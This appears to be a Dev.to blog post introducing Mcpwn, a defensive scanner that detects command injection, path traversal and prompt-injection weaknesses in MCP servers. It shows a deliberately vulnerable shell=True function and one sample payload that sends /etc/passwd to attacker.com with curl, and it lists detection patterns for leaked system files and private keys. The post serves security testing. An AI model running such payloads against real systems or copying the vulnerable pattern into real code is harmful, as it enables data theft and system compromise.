Building a Security Scanner for MCP Servers
Source: Dev.to
Introduction
Model Context Protocol (MCP) is Anthropic’s new standard for connecting AI agents to external tools and data sources. While working with MCP servers I noticed a critical gap: there is no automated security testing for them.
MCP servers grant AI agents powerful capabilities such as file operations, command execution, and database access. A single vulnerable tool can lead to full system compromise, and manual code reviews often miss injection vulnerabilities in tool arguments.
Vulnerability Example
import subprocess

def execute_command(command: str):
    # Deliberately vulnerable: the agent-supplied string reaches the shell unsanitized
    return subprocess.run(command, shell=True, capture_output=True)
The vulnerability lies in the unsanitized command argument. An AI agent could inject malicious payloads, e.g.:
ls; curl http://attacker.com/exfil?data=$(cat /etc/passwd)
Mcpwn – Automated Security Scanner for MCP Servers
Mcpwn is a pure‑Python scanner that detects runtime vulnerabilities in MCP servers. Its name is a play on “MCP pwn”.
Semantic Detection Over Crash Detection
Instead of looking for crashes, Mcpwn analyzes response content for known patterns:
- uid=1000(user) → Command injection
- root:x:0:0:root → Path traversal / file read
- -----BEGIN PRIVATE KEY → Private key leakage
- Timing deviations → Blind injection
Zero Dependencies
- Implemented using only the Python standard library.
- No pip install required, simplifying CI/CD integration and reducing the attack surface.
Structured Output
Mcpwn can emit findings in JSON and SARIF formats, making it easy to consume by AI tools or CI pipelines.
{
  "summary": {
    "total": 3,
    "by_severity": { "CRITICAL": 2, "HIGH": 1 }
  },
  "findings": [ /* ... */ ]
}
Core Components
core/
├── pentester.py # Orchestrator (thread‑safe, timeout handling)
├── detector.py # Semantic detection engine
└── reporter.py # JSON/HTML/SARIF report generation
Implemented Checks
- Tool argument injection (RCE, path traversal)
- Resource path traversal
- Prompt injection (context confusion, delimiter breakout)
- Protocol fuzzing (malformed JSON‑RPC)
- State desynchronization attacks
- Resource exhaustion
Detection Example
import re

def detect_rce(response: str) -> bool:
    # Returns True when the response carries a marker of shell command execution
    patterns = [
        r'uid=\d+\([^)]+\)',   # Unix user ID, as printed by `id`
        r'gid=\d+\([^)]+\)',   # Unix group ID, as printed by `id`
        r'root:x:0:0:root'     # /etc/passwd entry
    ]
    return any(re.search(p, response) for p in patterns)
During testing, Mcpwn uncovered RCE vulnerabilities in production MCP servers that manual reviews had missed.
Sample Scan Output
$ python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmp
[INFO] Found 2 tools, 0 resources
[WARNING] execute_command: RCE via command
[WARNING] Detection: uid=1000(user) gid=1000(user)
[INFO] Mcpwn complete
Usage
Quick Scan (≈5 seconds)
python mcpwn.py --quick npx -y @modelcontextprotocol/server-filesystem /tmp
Generate JSON Report
python mcpwn.py --output-json report.json
CI/CD Integration (SARIF)
python mcpwn.py --output-sarif report.sarif
Design Considerations
- Semantic detection beats crash detection – pattern matching finds data leaks that don’t cause crashes.
- Thread safety – MCP servers handle concurrent requests; Mcpwn uses proper locking for request IDs and health checks.
- Timeouts everywhere – default 10 s timeout, configurable; quick mode uses 5 s to avoid hangs.
- False‑positive mitigation – e.g., path traversal detection requires two or more markers before raising an alert.
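Putting the Detection Example and the design rules above together, the following is an added illustration (not Mcpwn's own code) of a semantic detector that returns typed findings: RCE markers fire on their own, path traversal needs two or more /etc/passwd markers, a private key header is a leak, and a response that is silent but far slower than a baseline is flagged as blind injection. The summarize() helper builds the by_severity block shown in the Structured Output section; the marker lists, threshold and sample responses are constructed for this example.

```python
import json
import re

# Constructed marker sets for this example (not Mcpwn's own lists).
RCE_PATTERNS = [r'uid=\d+\([^)]+\)', r'gid=\d+\([^)]+\)']
PASSWD_MARKERS = [r'root:x:0:0:', r'/bin/(?:ba)?sh', r'nobody:x:', r'daemon:x:']
KEY_MARKER = r'-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----'
TIMING_SLACK = 4.0  # seconds beyond baseline that counts as a timing deviation

def detect(response: str, elapsed: float, baseline: float) -> list:
    """Classify one tool response into findings (constructed logic)."""
    findings = []
    rce = [p for p in RCE_PATTERNS if re.search(p, response)]
    if rce:
        findings.append({"type": "rce", "severity": "CRITICAL", "markers": rce})
    # A lone 'root:x:0:0:' may just be the echoed argument, so require
    # at least two independent /etc/passwd markers before reporting.
    trav = [p for p in PASSWD_MARKERS if re.search(p, response)]
    if len(trav) >= 2:
        findings.append({"type": "path_traversal", "severity": "HIGH", "markers": trav})
    if re.search(KEY_MARKER, response):
        findings.append({"type": "private_key_leak", "severity": "CRITICAL", "markers": [KEY_MARKER]})
    # Blind injection: nothing visible in the body, but the call took far
    # longer than the baseline measured with a benign argument.
    if baseline > 0 and elapsed >= baseline + TIMING_SLACK:
        findings.append({"type": "blind_injection", "severity": "HIGH",
                         "markers": [f"elapsed={elapsed:.1f}s baseline={baseline:.1f}s"]})
    return findings

def summarize(findings: list) -> dict:
    """Build the summary/findings report structure from a list of findings."""
    by_sev = {}
    for f in findings:
        by_sev[f["severity"]] = by_sev.get(f["severity"], 0) + 1
    return {"summary": {"total": len(findings), "by_severity": by_sev}, "findings": findings}

if __name__ == "__main__":
    # Constructed sample responses: (body, elapsed seconds, baseline seconds)
    samples = [
        ("uid=1000(user) gid=1000(user) groups=1000(user)", 0.2, 0.2),
        ("root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin", 0.2, 0.2),
        ("echo root:x:0:0: done", 0.2, 0.2),  # single marker only: no finding
        ("", 5.3, 0.3),                       # silent but slow: blind injection
    ]
    all_findings = [f for body, t, b in samples for f in detect(body, t, b)]
    print(json.dumps(summarize(all_findings), indent=2))
```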
Planned Features
- SSRF injection detection
- Deserialization attack testing
- Schema pollution checks
- Authentication bypass testing
Current Limitations
- Does not detect configuration issues such as exposed credentials.
- Misses business‑logic flaws and complex multi‑step attack chains.
- Focuses on runtime exploit patterns; manual review is still needed for logic errors.
Getting Started
git clone https://github.com/Teycir/Mcpwn.git
cd Mcpwn
python3 mcpwn.py --help
Mcpwn is MIT‑licensed, includes 45 passing tests, and requires zero external dependencies.
GitHub: https://github.com/Teycir/Mcpwn
Discussion
What security testing approaches have you found effective for AI‑agent infrastructure? Feel free to share your thoughts.